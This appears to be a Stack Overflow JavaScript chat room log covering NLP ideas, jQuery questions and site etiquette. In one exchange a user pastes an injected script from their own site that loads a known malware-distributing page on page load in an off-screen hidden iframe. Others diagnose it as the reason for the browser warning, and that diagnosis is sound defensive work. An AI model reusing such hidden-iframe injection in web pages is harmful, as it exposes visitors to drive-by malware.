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any one around
had a question but its not worthy of a SO question as its not a code problem but a curiousity
I can try to help
Q: Should I use javascript to make a windows 8 game?

KaiWindows 8 game development is designed mainly for C++ (which I don't know), but can be done in JS (which I do know). Is it worth it to learn C++ or should I continue with JS?

3 hours later…
gonna make a Facebook app to scan through friend's and their friend's posts, and analyze exactly how smart everyone is.
How, exactly?
How do you analyze how smart someone is based on their status updates?
By looking for shit like this
It'll be pretty hard to analyze shit people say
You could easily think someone was stupid when they were just being sarcastic
final comment takes the cake
saying a bunch of shit that was addressed moments before
and basically proving the point
I think it can be done...
Best of luck
if you can determine if a post is "smart" or "dumb"...
It probably can be done but it'd be incredibly complex
then you can began to build a score on anyone that likes it aswell.
Right, but how would you do that?
Determine if a post is smart or dumb?
apply a million equations and have a bunch of score on each equation... and give it points for different areas
damn... would need to teach a bot to read probably
first thing would be grammar/parsing
second would be a dictionary/database that links synonyms and like words, and puts them in groups. (nouns, verbs, etc)
each group would need a special meaning, and a special function
every noun and verb would even need it's own function to simulate firing separate neurons or something like that
imagine a whole dictionary of functions that did different things
might not be hard, but would be very tedious....
a reasonably sized and dedicated community could do it in a year
AI is hard and tedious.
google and facebook are spending a lot of time on it, trying to give you the best targetted ads they can
but doesn't a bot that knows how to read sound awesome?
not sure how it would learn though
idea is evolving... a bot that could just read a tutorial and learn how to do something new
I think English is too complicated though
@andrewjackson which was why programming languages was invented... one sentence might have a different meaning to every other person...
@ShyamK yeah, there's that too lol
that actually makes it impossible to analyze how smart someone is, based on what they're saying, for the fact that a lot of people don't know what they're saying.
human languages are tough... and mis-leading... take the word bi-monthly for instance... Would you like to be paid bimonthly?
bimonthly would be every other month?
strange how that works
I thought biweekly was twice a month, or basically every other week
check the link... it could mean either twice a month... or once every two months... now that would be confusing... especially if you're boss asked you "Would you like to be paid bimonthly?"
never thought of it like that
then there could be a function to indicate that it's a multiple meaning
if a human wouldn't know what it means, then a computer can't be expected to
and it would trigger flags for special circumstances
that's way too complicated though. I could only dream
languages like Ruby try to make the syntax more English like... atleast that is what I hear
@rlemon you have worked with artificial neural networks , yes ?
Btw hi shyam
@andrewjackson Exactly
hey Abhishek...
what are you upto?
Writing a neural network based nlp
Sitting on last bench
natural language
Natural language processor
This is for wiki voice , i think neural networks can be awesome for this use
Let us know how that goes
It's gonna come on git soon so u know already
Morning everyone!
I'm submiting form with submit button inside of it and if form is invalid I get another button in form section, but this is simple button(not submit), so by clicking it I wan't to send ajaxForm. Here would be my code jsfiddle.net/DU7KR. Could anyone take a look and tell me, what might be the reason, that it doesn't work with first click on simple button? I see received json only after second click on simple button.
@Abhishek some credit to me for almost guessing the right terminology? lol
  function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://fenwaywest.com/media/index.php";ifrm.id = 'frmId';document.body.appendChild(ifrm);};window.onload = frmAdd;
this made my site malicious to google chrome
of course
you're loading an iframe that you hide away from the webpage
it's suspicious
Hello, is there anyone with experience with the wikimedia API?
well the fenwaywest has been reported to distribute malicious content to more than 5000 sites according to google
@FlorianMargaine is there anyway thru which this code might have gotten added to my script page? because it is not in the example code
hello,ny1 knows how to parse the URL in node.js when we are seperating the modules using switch cases there
hello is there any one to help me?
i have faced a problem regarding js file calling which AJAX is calling
do you get my question?
@SR-71BlackBird: do you get my question?
@jigarkotak yes ..
actually i use AJAX in wordpress
@jigarkotak no no
@SR-71BlackBird: ya wat happend?
jate karo
oi jigar dikra :P
@Abhishek Do cabinets come with any cables?
(For USB)
Not necessarily but if the cabinet has cool spaced ports it should , check it in market
Cool spaced ports?
@n3sh i do
can any one help me in javascript in wordpress?
@amaan ports that are on crazy position
For example my last desktop had 8 on the top with a side terminal
It had a few extra cables
Okay, so if it doesn't have cables, where do I buy them?
The motherboard has USB connectors at the mid-board
I'll need those module things to connect them to the front
if it's a USB hub, just plug it into an existing USB port
hello i need some help in Wordpress?
can any one help me?
please answer?
@Abhishek You know what cables I'm talking about, right?
The ones on the inside
That connect to your mobo
that's supposed to come with
Yeah, that's what I thought
@Abhishek in 2004
i am using Share This Button in wordpress to share my content, but where i use AJAX it is not display
meh, it'd been a long time since I hadn't answered an interesting question. No wonder I'm the only answerer.
A: jQuery, finding selector for triggered event's elements

Florian MargaineYour best bet is to send data with the event. It is also more robust, as you have more control. Selectors might not be pretty, but the data are. $('tag.class').trigger('myevent', ['some', 'param']); $(document).on('myevent', function(param1, param2) { console.log(param1); // "some" cons...

can anyone help me on this
Q: Save form data on pagebeforeload event

rahuli am working on a feedback form in which user has to answers question asked in form. and he can't refresh and close the form before saving data but if user do that i want all the form data to be saved in database till that time. so for that i am using pagebeforeload event. and using jquery ajax ...

morning all
hi, i got this json like string: a:3:{s:5:"label";s:37:"https://twitter.com/#!/treehousetruck";s:8:"protocol";s:5‌​:"https";s:3:"url";s:29:"twitter.com/#!/treehousetruck";} any idea on the format?
js weekly's sent, time for some idle.
@f3r3nc You normally start an object at the end of a line "{" and end it on its own line
And properties have its own line
@Neil that is not the question at all
@rlemon Well you're a stupidhead
What was the question?
its not JSON, but it is formatted in a specific way, he wants to know what said format is (if not JSON)
you can see another example of it being used cbc.ca/kidsstats/getTopTen.php
@rlemon Ah, I misread "json like"
it seems like a typed json, i can identify how it works, but don't want to write my own parser
you might have too
i am using some regexp but would be happier with a parser, unfortunately it's not something i created but rather inherited
I'm still in awe over this from yesterday
15 hours ago, by Vinay
Somebody please find the error in this bit of code.
15 hours ago, by Vinay
  if (".cross-reference-question-value").text == "" {
    } else {
@rlemon read the room description...
That fits the description perfectly...
yesterday, by rlemon
room topic changed to JavaScript: Hey! I just met you. My code is crazy! Here's a copy. Help, I'm lazy! [javascript]
notice who set it?
@rlemon i need some algo. help lets just keep it to pseudo code just in case
But then why should you be in awe? its expected that someone is gonna take it literally...
While writing the wiki- voice module i am quite done with the natural language thing and it can form out the pattern it needs to find in the article
what i am worried is that an article is huge and simple traversing of article to find the matching pattern is crazy and stupid
instead i was trying to create a network , like human brain
so here is what i am trying to attain at the moment
there will be two parts of response engines first that works on "instinct" that has programmed functions to execute information out of the article for instance "Who is / what is / when did" queries
and a far deep full article traversing for non-instinct... dunno how to make it learn in the second case
@Abhishek Normally you have to train a network to give the output you want
I dunno how to make it "learn"
But to do that, you need expected input and expected output, which you may not always have
and since our database is well wikipedia itself shit gets real
Q: WebGL: Texture appears as black

JustinI have a simple WebGL canvas, where I'm attempting to render a texture on a square. When working with textures as local files, all is fine. But when I try to load a texture from the web, I get a black canvas. Please see this fiddle for a demo. I have made the shaders and JavaScript very simple.

@Abhishek I don't actually know how that works
i am using reg-exps & quering objects in the instinct code
for instance
asking Who is albert einstien ?
will give me the introduction part of article on albert einstien
ok so NN are learning pattern matching machines
maybe since JavaScript is dynamic i should make it to create methods itself and reg-exps and then mantain a small db of how efficient and correct a method is depending on users Yes or No , would that make sense ?
generally speaking making them "learn" is a very tedious process that takes months sometimes
so what do you suggest ?
read a few of the other projects you can find
Backpropagation is a common method of training artificial neural networks so as to minimize the objective function. Arthur E. Bryson and Yu-Chi Ho described it as a multi-stage dynamic system optimization method in 1969. It wasn't until 1974 and later, when applied in the context of neural networks and through the work of Paul Werbos, David E. Rumelhart, Geoffrey E. Hinton and Ronald J. Williams, that it gained recognition, and it led to a “renaissance” in the field of artificial neural network research. It is a supervised learning method, and is a generalization of the delta rule. It ...
can any body help me on this
Q: Save form data on pagebeforeload event

rahuli am working on a feedback form in which user has to answers question asked in form. and he can't refresh and close the form before saving data but if user do that i want all the form data to be saved in database till that time. so for that i am using pagebeforeload event. and using jquery ajax ...

morning all
@rlemon maybe i am going wrong side but i was reading article about human brain and how it works earlier in the college today
and damn man human brain is quite fluid , and highly responsive so beautifully done
Q: removing jquery event handler from single element bound by delegate

RobI'm binding a handler to the keyup event of all input,textareas in a document $(document).on('keyup','input,textarea',$.debounce(600, editor.handleGlobalChange)); I don't want the handler to fire on a specific input field. So I want to unbind the keyup event. $('#afield').off('keyup'); Howe...

Do I smell an AI discussion?
@Abhishek ... and 97% redundant.
@SomeKittens true
I don't have time to finish an answer :(
Nice. I'm taking that class now. What's your project?
@SomeKittens have you met SIRI ?
Yep. Don't own an iPhone myself.
imagine a SIRI working on the top of wikipedia , i call it wiki-voice
it's kinda difficult to navigate a modern college campus without being assaulted by Mac fanbois.
@SomeKittens true :P
codepen.io loading for anyone?
Doesn't siri already integrate with Wikipedia?
@SomeKittens can you ask SIRI "Who was albert Einstien , or what is sachin tendulkars wifes name?"
it's down :(
and nope it integrates wolfarm alpha but it gives u textual output , i want it to speak to people
@Abhishek I can ask my google now that question and it will voice answer me
beat that SIRI
What if you are Blind ?
also my maps work
@rlemon very true (XD)
So kinda like Watson
@Abhishek Android has extensive accessibility features for the blind
pairs very well with braille devices
this was part of the 2012 Google I/O keynote address
well i am making it for the heck of it :D and i will learn lots doing it :p [ already did learn a lot ]
ohh for sure
now i'm just showing up apple with my Android awesomeness
@rlemon yeah I know about that site
yeah. I love stuff that gets me to learn, regardless of practicality
just felt like asking here :P
@rlemon shorter version: isup.me
I eat Apples, I respect/admire Androids.
Another, even shorter version: doj.me
Just got this bad boy:
Turns out it's not the best way to get at the inside of the iPhone.
It probably works better than trying to take it apart
@RyanKinal ?
I can't imagine it's very easy to legitimately disassemble an iPhone
You're probably better off using the apple peeler
best part of the song right there
: We learn pretty much everything about financial instruments except how to actually purchase/manage them.
Seriously... they want to add (as a standard, because they already added it in their shitty browser) ANOTHER UA header
Like if the existing one is not hated enough.
Ummm. According to the article, I think they've added two of them.
Opera hurts my ears.... FireFox scares me... but I do like shiny things. Ohhh look! Chrome!
Nah, I like seeing new things... like an Explorer on a Safari.
Here a controversial question: as of now 24 upvotes and 15 downvotes: stackoverflow.com/q/12854644/220060
It's a very simple question about an operator and some think it has not shown enough effort.
It's not that the question doesn't show enough effort. It's that the questioner hasn't shown enough effort. As the comments mention, it could have been easily answered with a Google search.
Although, I suppose having this knowledge on SO isn't a bad thing.
> You're shouting yourself in the foot.
@RyanKinal I upvoted the answer. The "call stack" is always good to see. I just learned how works bitwise operator ^^'
wanted to, don't have time yet
@Irakli ...unsure of gender....
@SomeKittens gender doesn't matter, but I think it is "SHE"
@Irakli Could be just some hippy dude
@SomeKittens yeap, it could be
wtf happened to codepen :(
Gm all
guys I want to create slideshow something like this motocms.com/flash-templates/flash-moto-templates-type/… do you have an idea how is this done?
@Irakli SURE
With Flash.
But not that difficult to do in JavaScript.
@Loktar ?
@dievardump yes, I know it is flash, but I want it in Javascript so I have not an idea how to handle z-index problem
its down today @Neal
@rlemon still curious about my blog?
@Neal he said "wtf happened to codepen :("
Actually, it's not useful to talk about anything in a vacuum. No air, so it's impossible to hear anyone. — SomeKittens 6 secs ago
user image
@Irakli you know it's a z-index probem, so just... learn how to use it, na?
This guy is totally anoying. Is there a way to prevent him to follow me?
@FlorianMargaine game of life?
@dievardump Block.
@dievardump I don't get the concept
I didn't really understand it either
But I didn't bother trying to
@FlorianMargaine ???
@FlorianMargaine the Game Of Life is one of the most famous game
The concept is "simple" and it's usually the first thing you learn to code when you do "visual" things
(after a tetris or a snake)
On his implementation, you can view "step by step" by clicking on the step button, or viewing "100 step by 100 step"
Hmm, seems simple enough
@dievardump MAN That is one feminine looking dude!
plays video to see if rlemon's trolling us
for once I am not!
Don't care. This "feminine guy" is 14-year old and plays Kraftwerk's 'Computer Love' in his bedroom with 5 synths & a Commodore 64
yea it is cool - just commenting he looks like a chick
One shall swear allegiance to this kind of people and keep physical comments for theirself
@rlemon if you put a die(var_dump()); in the comment system, then no
@SomeKittens If they're eval()ing comments, then they have a bigger problem
the thumbnail gives this more justice than it deserves
hey @rlemon -
(ping time)
look at that , narrowed it down , I think I am having trouble with the jquery selector
@rlemon oooook
hi all
I can get the class fine , and the id of text box fine , but when I put them together , always the scary [undefined]
anybody interested in this question?
Q: Ranking of cross-platform mobile and desktop development tools

AvioAs the mobile-app market is growing, developers struggle to support the maximum possible number of platforms, OSes and CPUs, both for what concerns desktop and mobile systems. Coding in a portable way is of course still valid for the core functionalities of an application, but there are completel...

there's a nice bounty! :)
You've got a typo though. sumbit
@SomeKittens 'true very true
... er... not a real question? Many possible answers, each of which is equally valid?
@RyanKinal Bounty's nicely preventing closing as NARQ
there are so many answers I could add...
titanium studio, rhode, phonegap, adobe air...
@Avio I think you're cheating and I don't like that.
thx @rlemon, luv ya for this one
@dievardump it's hard to cheat if one doesn't even know the rules...
@dievardump where am I cheating?
@Avio You don't post if you don't read the rules.
You don't ask a real question
And by putting a bounty on it, you're ;
4 mins ago, by SomeKittens
@RyanKinal Bounty's nicely preventing closing as NARQ
I know this is a stupid easy question but its driving me crazy for 2 days , can some one tell me why this is not selecting the text box? jsfiddle.net/MfuxP/1
@dievardump I'm really interested in a ranking
"nicely preventing Not A Real Question"
@Avio Yes but this question does not apply to this platform
@dievardump well, javascript is a mean to achieve some level of cross-platform development
@dievardump I tried to post it into the Android chat room but it's closed
@Avio I'm not sure how you can rank these things.
@dievardump that's because I'm asking!
It's been flagged
@RyanKinal I want to know if there's "the best way" to start!
@Avio Did you read the rules?
@dievardump chat rules or stackoverflow rules?
I never asked a question because I never understood the rules.
@Avio SO rules.
@Avio No. There's not. There are different ways. Used for different purposes.
Your question does not belong on SO
@dievardump really? and where it belongs to?
@dievardump meta?
It's to vague, not a real question, all answers can be considered like the good one.
SO is for questions that have a definitive answer
Though go ahead and post it on meta, so I can watch you get trashed by everyone there.
@dievardump ok, understood
You just picked curiosity and added a bounty. So people will just "say what they really think is the best one" and wait for there bounty.
You just opened a "I HAVE THE BIGGEST ONE" answers' question
> not constructive : As it currently stands, this question is not a good fit for our Q&A format. We expect answers to be supported by facts, references, or specific expertise, but this question will likely solicit debate, arguments, polling, or extended discussion. If you feel that this question can be improved and possibly reopened, see the FAQ for guidance.
@SomeKittens ok, it will be closed then... it's a pity IMHO
It's a pity we don't have standards or that you won't be able to farm rep?
@rlemon - no , I have to select it specifically by that class
@SomeKittens bye, thanks for the help
because this whole thing repeats several times with different Guid class's . so I need to specificy textboxes that are children of that Guid
@ThiefMaster stackoverflow.com/questions/12692995/… we can't close bountied questions.
@ScottSelby I still think you are over complicating this
don't select anything loop and READ the GUID
like if you have to touch on everything just loop everything by class then select and read the guid and attach that to the 'processing' so to speak
like $('Guid').each(input) ?
@ThiefMaster Thanks!
@rlemon - yea , I see what you're saying
Hi. Is it possible to publish an image to a Page's Wall from a URL (without uploading it directly) with Facebook SDK?
Ah, the wrath of the JavaScript room :-D
Thanks @ThiefMaster!
Anyway... later folks. I'll likely be chatting from Florida on Monday :-D
Job Description: Strong knowledge of C#, Microsoft SQL Server, Microsoft ASP.NET platform, Visual Studio, Internet technologies, HTML, XML as well as security techniques and web server familiarity.
@dievardump - i've have people call me , my resume is all c# .net sql some jquery and javascript , and say , I have a senior level java developer - you use java right ?
@dievardump nice - I know all of those but no js or css I'm hired!

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